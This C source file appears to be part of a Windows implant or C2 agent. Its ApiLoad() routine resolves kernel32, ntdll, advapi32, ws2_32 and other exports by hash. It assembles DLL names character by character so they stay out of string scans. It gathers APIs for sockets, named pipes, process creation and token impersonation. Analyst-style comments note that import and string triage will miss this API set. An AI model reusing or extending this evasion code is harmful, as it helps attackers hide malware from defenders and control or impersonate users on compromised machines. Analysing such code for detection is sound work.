
#include "ApiLoader.h"
#include "ProcLoader.h"
#pragma intrinsic(memset)
#pragma function(memset)
// Local definition of memset for this translation unit.
// `#pragma function(memset)` makes MSVC emit real calls instead of expanding
// the intrinsic, which is also what permits defining the function here.
//
// Fills `Size` bytes at `Destination` with the low 8 bits of `Value` and
// returns `Destination`. No bounds or NULL checks are made: the caller must
// own at least `Size` writable bytes.
void* __cdecl memset(void* Destination, int Value, size_t Size)
{
    const size_t kWord = sizeof(size_t);
    const unsigned char fill = (unsigned char)Value;
    unsigned char* out = (unsigned char*)Destination;

    if (Size >= kWord) {
        // Replicate the fill byte into every byte lane of one machine word.
        size_t word = 0;
        for (size_t lane = 0; lane < kWord; ++lane)
            word = (word << 8) | fill;

        // Byte stores until the cursor sits on a word boundary.
        for (; Size != 0 && ((size_t)out % kWord) != 0; --Size)
            *out++ = fill;

        // Whole-word stores while a full word still fits.
        for (; Size >= kWord; Size -= kWord, out += kWord)
            *(size_t*)out = word;
    }

    // Remaining tail (or the whole buffer when it is shorter than a word).
    for (; Size != 0; --Size)
        *out++ = fill;

    return Destination;
}
#pragma intrinsic(memcpy)
#pragma function(memcpy)
// Local definition of memcpy for this translation unit.
// `#pragma function(memcpy)` makes MSVC emit real calls instead of expanding
// the intrinsic, which is also what permits defining the function here.
//
// Copies `Size` bytes from `Src` to `Dst` front to back and returns `Dst`.
// Overlapping ranges are not handled, and no bounds or NULL checks are made:
// the caller must guarantee both buffers hold at least `Size` bytes.
void* __cdecl memcpy(void* Dst, const void* Src, size_t Size)
{
    const size_t kWord = sizeof(size_t);
    unsigned char* out = (unsigned char*)Dst;
    const unsigned char* in = (const unsigned char*)Src;

    // Word-sized moves are used only when both pointers start word-aligned;
    // otherwise everything goes through the byte loop below.
    const bool bothAligned = ((((size_t)out) | ((size_t)in)) % kWord) == 0;
    if (bothAligned) {
        for (; Size >= kWord; Size -= kWord) {
            *(size_t*)out = *(const size_t*)in;
            out += kWord;
            in += kWord;
        }
    }

    // Tail bytes, or the entire copy on the unaligned path.
    for (; Size != 0; --Size)
        *out++ = *in++;

    return Dst;
}
// Identity pass-through for a narrow character: the argument comes back
// unchanged. ApiLoad() routes every character of the DLL names it assembles
// through this function instead of writing a string literal.
// NOTE(review): presumably this keeps those names out of the binary as
// contiguous strings, so plain string scans for them would not match;
// confirm against the build's optimisation settings.
CHAR HdChrA(CHAR c)
{
    CHAR same = c;
    return same;
}
// Wide-character counterpart of HdChrA: returns its argument unchanged.
// No caller is visible in this part of the file.
WCHAR HdChrW(WCHAR c)
{
    WCHAR same = c;
    return same;
}
// Process-wide lookup tables. All three start out NULL; ApiLoad() allocates and
// fills them, and nothing in this file frees them. They must not be
// dereferenced unless ApiLoad() has returned TRUE.

// Module handles recorded by ApiLoad() (Kernel32, Iphlpapi, Advapi32, Msvcrt,
// Ws2_32, Ntdll).
SYSMODULES* SysModules = NULL;
// Function pointers resolved from kernel32, iphlpapi, advapi32, msvcrt and ws2_32.
WINAPIFUNC* ApiWin = NULL;
// Function pointers resolved from ntdll.
NTAPIFUNC* ApiNt = NULL;
// Allocates the three global tables (SysModules, ApiWin, ApiNt) and fills them
// with function pointers looked up at run time.
//
// Lookup is by hash constant, not by name: kernel32 and ntdll are located with
// GetModuleAddress(HASH_LIB_*), and every export with
// GetSymbolAddress(module, HASH_FUNC_*). Neither helper is defined in this
// file. iphlpapi, advapi32, msvcrt and ws2_32 are brought in with LoadLibraryA
// from names assembled one character at a time through HdChrA.
//
// Analyst note: none of these APIs is called through a name written in this
// function, so import-table and string triage of the built module should not
// be expected to show this API set. What stays observable is run-time
// behaviour: the four LoadLibraryA calls appear as image loads (for example
// Sysmon Event ID 7), and the resolved set itself shows the capabilities the
// module is prepared to use - named pipes, sockets, process creation, and
// token duplication / impersonation.
//
// Returns TRUE when ApiWin, the kernel32 handle, ApiNt and the ntdll handle
// were all non-NULL, FALSE otherwise. The results of the individual
// GetSymbolAddress calls and of the four LoadLibraryA calls are not part of
// that decision, so TRUE does not guarantee that every pointer is non-NULL.
BOOL ApiLoad()
{
// Bootstrap: find kernel32 and LocalAlloc by hash, then use LocalAlloc for the tables.
HMODULE hKernel32Module = GetModuleAddress(HASH_LIB_KERNEL32);
decltype(LocalAlloc)* allocProc = (decltype(LocalAlloc)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_LOCALALLOC);
// NOTE(review): allocProc is called without a NULL check, and SysModules is
// dereferenced two lines further down before any allocation result has been
// tested. Only ApiWin and ApiNt are checked later. On the FALSE paths the
// blocks already allocated here are not released.
// LPTR = zero-initialised fixed memory, so unresolved fields stay NULL.
SysModules = (SYSMODULES*) allocProc(LPTR, sizeof(SYSMODULES));
ApiWin = (WINAPIFUNC*) allocProc(LPTR, sizeof(WINAPIFUNC));
ApiNt = (NTAPIFUNC*) allocProc(LPTR, sizeof(NTAPIFUNC));
SysModules->Kernel32 = hKernel32Module;
if ( ApiWin && hKernel32Module) {
// kernel32: file, pipe, process/thread, heap, synchronisation and time APIs.
ApiWin->LoadLibraryA = (decltype(LoadLibraryA)*)GetSymbolAddress(hKernel32Module, HASH_FUNC_LOADLIBRARYA);
ApiWin->CopyFileA = (decltype(CopyFileA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_COPYFILEA);
ApiWin->CreateDirectoryA = (decltype(CreateDirectoryA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_CREATEDIRECTORYA);
ApiWin->CreateFileA = (decltype(CreateFileA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_CREATEFILEA);
ApiWin->CreateNamedPipeA = (decltype(CreateNamedPipeA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_CREATENAMEDPIPEA);
ApiWin->CreatePipe = (decltype(CreatePipe)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_CREATEPIPE);
ApiWin->CreateProcessA = (decltype(CreateProcessA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_CREATEPROCESSA);
ApiWin->CreateEventA = (decltype(CreateEventA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_CREATEEVENTA);
ApiWin->CreateThread = (decltype(CreateThread)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_CREATETHREAD);
ApiWin->DisconnectNamedPipe = (decltype(DisconnectNamedPipe)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_DISCONNECTNAMEDPIPE);
ApiWin->DeleteCriticalSection = (decltype(DeleteCriticalSection)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_DELETECRITICALSECTION);
ApiWin->DeleteFileA = (decltype(DeleteFileA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_DELETEFILEA);
ApiWin->EnterCriticalSection = (decltype(EnterCriticalSection)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_ENTERCRITICALSECTION);
ApiWin->TryEnterCriticalSection = (decltype(TryEnterCriticalSection)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_TRYENTERCRITICALSECTION);
ApiWin->GetExitCodeProcess = (decltype(GetExitCodeProcess)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETEXITCODEPROCESS);
ApiWin->GetExitCodeThread = (decltype(GetExitCodeThread)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETEXITCODETHREAD);
ApiWin->FindClose = (decltype(FindClose)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_FINDCLOSE);
ApiWin->FindFirstFileA = (decltype(FindFirstFileA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_FINDFIRSTFILEA);
ApiWin->FindNextFileA = (decltype(FindNextFileA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_FINDNEXTFILEA);
ApiWin->FreeLibrary = (decltype(FreeLibrary)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_FREELIBRARY);
ApiWin->GetACP = (decltype(GetACP)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETACP);
ApiWin->GetComputerNameExA = (decltype(GetComputerNameExA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETCOMPUTERNAMEEXA);
ApiWin->GetCurrentDirectoryA = (decltype(GetCurrentDirectoryA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETCURRENTDIRECTORYA);
ApiWin->GetDriveTypeA = (decltype(GetDriveTypeA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETDRIVETYPEA);
ApiWin->GetFileSize = (decltype(GetFileSize)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETFILESIZE);
ApiWin->GetFileAttributesA = (decltype(GetFileAttributesA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETFILEATTRIBUTESA);
ApiWin->GetFullPathNameA = (decltype(GetFullPathNameA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETFULLPATHNAMEA);
ApiWin->GetLastError = (decltype(GetLastError)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETLASTERROR);
ApiWin->GetLogicalDrives = (decltype(GetLogicalDrives)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETLOGICALDRIVES);
ApiWin->GetOEMCP = (decltype(GetOEMCP)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETOEMCP);
// The field is named GetModuleBaseNameA, but the hash constant is for the
// K32-prefixed export, looked up in kernel32.
ApiWin->GetModuleBaseNameA = (decltype(GetModuleBaseNameA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_K32GETMODULEBASENAMEA);
ApiWin->GetModuleHandleA = (decltype(GetModuleHandleA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETMODULEHANDLEA);
ApiWin->GetLocalTime = (decltype(GetLocalTime)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETLOCALTIME);
ApiWin->GetSystemTimeAsFileTime = (decltype(GetSystemTimeAsFileTime)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETSYSTEMTIMEASFILETIME);
ApiWin->GetProcAddress = (decltype(GetProcAddress)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETPROCADDRESS);
ApiWin->GetTickCount = (decltype(GetTickCount)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETTICKCOUNT);
ApiWin->GetTimeZoneInformation = (decltype(GetTimeZoneInformation)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETTIMEZONEINFORMATION);
ApiWin->HeapAlloc = (decltype(HeapAlloc)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_HEAPALLOC);
ApiWin->HeapCreate = (decltype(HeapCreate)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_HEAPCREATE);
ApiWin->HeapDestroy = (decltype(HeapDestroy)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_HEAPDESTROY);
ApiWin->HeapReAlloc = (decltype(HeapReAlloc)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_HEAPREALLOC);
ApiWin->HeapFree = (decltype(HeapFree)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_HEAPFREE);
ApiWin->InitializeCriticalSection = (decltype(InitializeCriticalSection)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_INITIALIZECRITICALSECTION);
ApiWin->IsWow64Process = (decltype(IsWow64Process)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_ISWOW64PROCESS);
// Reuses the pointer resolved during bootstrap instead of a second lookup.
ApiWin->LocalAlloc = allocProc;
ApiWin->LocalFree = (decltype(LocalFree)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_LOCALFREE);
ApiWin->LocalReAlloc = (decltype(LocalReAlloc)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_LOCALREALLOC);
ApiWin->LeaveCriticalSection = (decltype(LeaveCriticalSection)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_LEAVECRITICALSECTION);
ApiWin->MoveFileA = (decltype(MoveFileA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_MOVEFILEA);
ApiWin->MultiByteToWideChar = (decltype(MultiByteToWideChar)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_MULTIBYTETOWIDECHAR);
ApiWin->PeekNamedPipe = (decltype(PeekNamedPipe)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_PEEKNAMEDPIPE);
ApiWin->ReadFile = (decltype(ReadFile)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_READFILE);
ApiWin->RemoveDirectoryA = (decltype(RemoveDirectoryA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_REMOVEDIRECTORYA);
ApiWin->RtlCaptureContext = (decltype(RtlCaptureContext)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_RTLCAPTURECONTEXT);
ApiWin->SetEvent = (decltype(SetEvent)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_SETEVENT);
ApiWin->ResetEvent = (decltype(ResetEvent)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_RESETEVENT);
ApiWin->SetCurrentDirectoryA = (decltype(SetCurrentDirectoryA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_SETCURRENTDIRECTORYA);
ApiWin->SetNamedPipeHandleState = (decltype(SetNamedPipeHandleState)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_SETNAMEDPIPEHANDLESTATE);
ApiWin->Sleep = (decltype(Sleep)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_SLEEP);
ApiWin->VirtualAlloc = (decltype(VirtualAlloc)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_VIRTUALALLOC);
ApiWin->VirtualFree = (decltype(VirtualFree)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_VIRTUALFREE);
ApiWin->WaitForSingleObject = (decltype(WaitForSingleObject)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_WAITFORSINGLEOBJECT);
ApiWin->WaitNamedPipeA = (decltype(WaitNamedPipeA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_WAITNAMEDPIPEA);
ApiWin->WideCharToMultiByte = (decltype(WideCharToMultiByte)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_WIDECHARTOMULTIBYTE);
ApiWin->WriteFile = (decltype(WriteFile)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_WRITEFILE);
// iphlpapi: the name "Iphlpapi.dll" is written into a stack array one
// character at a time (each through HdChrA) rather than as a literal.
// NOTE(review): ApiWin->LoadLibraryA is called below without checking that
// its lookup succeeded.
CHAR iphlpapi_c[13];
iphlpapi_c[0] = HdChrA('I');
iphlpapi_c[1] = HdChrA('p');
iphlpapi_c[2] = HdChrA('h');
iphlpapi_c[3] = HdChrA('l');
iphlpapi_c[4] = HdChrA('p');
iphlpapi_c[5] = HdChrA('a');
iphlpapi_c[6] = HdChrA('p');
iphlpapi_c[7] = HdChrA('i');
iphlpapi_c[8] = HdChrA('.');
iphlpapi_c[9] = HdChrA('d');
iphlpapi_c[10] = HdChrA('l');
iphlpapi_c[11] = HdChrA('l');
iphlpapi_c[12] = HdChrA(0);
HMODULE hIphlpapiModule = ApiWin->LoadLibraryA(iphlpapi_c);
SysModules->Iphlpapi = hIphlpapiModule;
// A failed load is tolerated: the field stays NULL and ApiLoad carries on.
if (hIphlpapiModule) {
ApiWin->GetAdaptersInfo = (decltype(GetAdaptersInfo)*) GetSymbolAddress(hIphlpapiModule, HASH_FUNC_GETADAPTERSINFO);
}
// advapi32: name "Advapi32.dll" assembled the same way. The set resolved here
// is account lookup plus token handling: query, duplicate, impersonate, revert,
// and process creation under another token.
CHAR advapi32_c[13];
advapi32_c[0] = HdChrA('A');
advapi32_c[1] = HdChrA('d');
advapi32_c[2] = HdChrA('v');
advapi32_c[3] = HdChrA('a');
advapi32_c[4] = HdChrA('p');
advapi32_c[5] = HdChrA('i');
advapi32_c[6] = HdChrA('3');
advapi32_c[7] = HdChrA('2');
advapi32_c[8] = HdChrA('.');
advapi32_c[9] = HdChrA('d');
advapi32_c[10] = HdChrA('l');
advapi32_c[11] = HdChrA('l');
advapi32_c[12] = HdChrA(0);
HMODULE hAdvapi32Module = ApiWin->LoadLibraryA(advapi32_c);
SysModules->Advapi32 = hAdvapi32Module;
if (hAdvapi32Module) {
ApiWin->GetTokenInformation = (decltype(GetTokenInformation)*) GetSymbolAddress(hAdvapi32Module, HASH_FUNC_GETTOKENINFORMATION);
ApiWin->GetUserNameA = (decltype(GetUserNameA)*) GetSymbolAddress(hAdvapi32Module, HASH_FUNC_GETUSERNAMEA);
ApiWin->LookupAccountSidA = (decltype(LookupAccountSidA)*) GetSymbolAddress(hAdvapi32Module, HASH_FUNC_LOOKUPACCOUNTSIDA);
ApiWin->RevertToSelf = (decltype(RevertToSelf)*) GetSymbolAddress(hAdvapi32Module, HASH_FUNC_REVERTTOSELF );
ApiWin->SetThreadToken = (decltype(SetThreadToken)*) GetSymbolAddress(hAdvapi32Module, HASH_FUNC_SETTHREADTOKEN);
ApiWin->ImpersonateLoggedOnUser = (decltype(ImpersonateLoggedOnUser)*) GetSymbolAddress(hAdvapi32Module, HASH_FUNC_IMPERSONATELOGGEDONUSER);
ApiWin->DuplicateTokenEx = (decltype(DuplicateTokenEx)*) GetSymbolAddress(hAdvapi32Module, HASH_FUNC_DUPLICATETOKENEX);
ApiWin->CreateProcessAsUserA = (decltype(CreateProcessAsUserA)*) GetSymbolAddress(hAdvapi32Module, HASH_FUNC_CREATEPROCESSASUSERA);
ApiWin->CreateProcessWithTokenW = (decltype(CreateProcessWithTokenW)*) GetSymbolAddress(hAdvapi32Module, HASH_FUNC_CREATEPROCESSWITHTOKENW);
}
// msvcrt: name "msvcrt.dll" assembled the same way; supplies the formatting
// routines.
CHAR msvcrt_c[11];
msvcrt_c[0] = HdChrA('m');
msvcrt_c[1] = HdChrA('s');
msvcrt_c[2] = HdChrA('v');
msvcrt_c[3] = HdChrA('c');
msvcrt_c[4] = HdChrA('r');
msvcrt_c[5] = HdChrA('t');
msvcrt_c[6] = HdChrA('.');
msvcrt_c[7] = HdChrA('d');
msvcrt_c[8] = HdChrA('l');
msvcrt_c[9] = HdChrA('l');
msvcrt_c[10] = HdChrA(0);
HMODULE hMsvcrtModule = ApiWin->LoadLibraryA(msvcrt_c);
SysModules->Msvcrt = hMsvcrtModule;
if (hMsvcrtModule) {
// printf is resolved only in DEBUG builds.
#if defined(DEBUG)
ApiWin->printf = (printf_t)GetSymbolAddress(hMsvcrtModule, HASH_FUNC_PRINTF);
#endif
ApiWin->vsnprintf = (vsnprintf_t) GetSymbolAddress(hMsvcrtModule, HASH_FUNC_VSNPRINTF);
// NOTE(review): the constant name suggests this is msvcrt's _snprintf, which
// does not NUL-terminate on truncation - callers of ApiWin->snprintf would
// then have to terminate the buffer themselves; confirm against the hash table.
ApiWin->snprintf = (snprintf_t) GetSymbolAddress(hMsvcrtModule, HASH_FUNC__SNPRINTF);
}
// Ws2_32: name "Ws2_32.dll" assembled the same way; client and server socket
// calls.
CHAR ws2_32_c[11];
ws2_32_c[0] = HdChrA('W');
ws2_32_c[1] = HdChrA('s');
ws2_32_c[2] = HdChrA('2');
ws2_32_c[3] = HdChrA('_');
ws2_32_c[4] = HdChrA('3');
ws2_32_c[5] = HdChrA('2');
ws2_32_c[6] = HdChrA('.');
ws2_32_c[7] = HdChrA('d');
ws2_32_c[8] = HdChrA('l');
ws2_32_c[9] = HdChrA('l');
ws2_32_c[10] = HdChrA(0);
HMODULE hWs2_32Module = ApiWin->LoadLibraryA(ws2_32_c);
SysModules->Ws2_32 = hWs2_32Module;
if (hWs2_32Module) {
ApiWin->WSAStartup = (decltype(WSAStartup)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_WSASTARTUP);
ApiWin->WSACleanup = (decltype(WSACleanup)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_WSACLEANUP);
ApiWin->WSAGetLastError = (decltype(WSAGetLastError)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_WSAGETLASTERROR);
ApiWin->gethostbyname = (decltype(gethostbyname)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_GETHOSTBYNAME);
ApiWin->socket = (decltype(socket)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_SOCKET);
ApiWin->ioctlsocket = (decltype(ioctlsocket)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_IOCTLSOCKET);
ApiWin->connect = (decltype(connect)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_CONNECT);
ApiWin->setsockopt = (decltype(setsockopt)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_SETSOCKOPT);
ApiWin->getsockopt = (decltype(getsockopt)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_GETSOCKOPT);
ApiWin->closesocket = (decltype(closesocket)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_CLOSESOCKET);
ApiWin->select = (decltype(select)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_SELECT);
ApiWin->__WSAFDIsSet = (decltype(__WSAFDIsSet)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC___WSAFDISSET);
ApiWin->shutdown = (decltype(shutdown)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_SHUTDOWN);
ApiWin->recv = (decltype(recv)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_RECV);
ApiWin->recvfrom = (decltype(recvfrom)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_RECVFROM);
ApiWin->send = (decltype(send)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_SEND);
ApiWin->sendto = (decltype(sendto)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_SENDTO);
ApiWin->accept = (decltype(accept)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_ACCEPT);
ApiWin->listen = (decltype(listen)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_LISTEN);
ApiWin->bind = (decltype(bind)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_BIND);
}
}
else {
// ApiWin allocation failed or kernel32 was not found.
return FALSE;
}
if (ApiNt) {
// ntdll is located by hash with GetModuleAddress, not through LoadLibraryA.
HMODULE hNtdllModule = GetModuleAddress(HASH_LIB_NTDLL);
SysModules->Ntdll = hNtdllModule;
if ( hNtdllModule ) {
ApiNt->NtClose = (decltype(NtClose)*) GetSymbolAddress(hNtdllModule, HASH_FUNC_NTCLOSE);
ApiNt->NtContinue = (decltype(NtContinue)*) GetSymbolAddress(hNtdllModule, HASH_FUNC_NTCONTINUE);
ApiNt->NtFreeVirtualMemory = (decltype(NtFreeVirtualMemory)*) GetSymbolAddress(hNtdllModule, HASH_FUNC_NTFREEVIRTUALMEMORY);
ApiNt->NtQueryInformationProcess = (decltype(NtQueryInformationProcess)*) GetSymbolAddress(hNtdllModule, HASH_FUNC_NTQUERYINFORMATIONPROCESS);
ApiNt->NtQuerySystemInformation = (decltype(NtQuerySystemInformation)*) GetSymbolAddress(hNtdllModule, HASH_FUNC_NTQUERYSYSTEMINFORMATION);
ApiNt->NtOpenProcess = (decltype(NtOpenProcess)*) GetSymbolAddress(hNtdllModule, HASH_FUNC_NTOPENPROCESS);
ApiNt->NtOpenProcessToken = (decltype(NtOpenProcessToken)*) GetSymbolAddress(hNtdllModule, HASH_FUNC_NTOPENPROCESSTOKEN);
ApiNt->NtOpenThreadToken = (decltype(NtOpenThreadToken)*) GetSymbolAddress(hNtdllModule, HASH_FUNC_NTOPENTHREADTOKEN);
ApiNt->NtTerminateThread = (decltype(NtTerminateThread)*) GetSymbolAddress(hNtdllModule, HASH_FUNC_NTTERMINATETHREAD);
ApiNt->NtTerminateProcess = (decltype(NtTerminateProcess)*) GetSymbolAddress(hNtdllModule, HASH_FUNC_NTTERMINATEPROCESS);
ApiNt->RtlGetVersion = (decltype(RtlGetVersion)*) GetSymbolAddress(hNtdllModule, HASH_FUNC_RTLGETVERSION);
ApiNt->RtlExitUserThread = (decltype(RtlExitUserThread)*) GetSymbolAddress(hNtdllModule, HASH_FUNC_RTLEXITUSERTHREAD);
ApiNt->RtlExitUserProcess = (decltype(RtlExitUserProcess)*) GetSymbolAddress(hNtdllModule, HASH_FUNC_RTLEXITUSERPROCESS);
ApiNt->RtlIpv4StringToAddressA = (decltype(RtlIpv4StringToAddressA)*) GetSymbolAddress(hNtdllModule, HASH_FUNC_RTLIPV4STRINGTOADDRESSA);
ApiNt->RtlRandomEx = (decltype(RtlRandomEx)*) GetSymbolAddress(hNtdllModule, HASH_FUNC_RTLRANDOMEX);
ApiNt->RtlNtStatusToDosError = (decltype(RtlNtStatusToDosError)*) GetSymbolAddress(hNtdllModule, HASH_FUNC_RTLNTSTATUSTODOSERROR);
}
else {
// ntdll was not found.
return FALSE;
}
}
else {
// ApiNt allocation failed.
return FALSE;
}
return TRUE;
}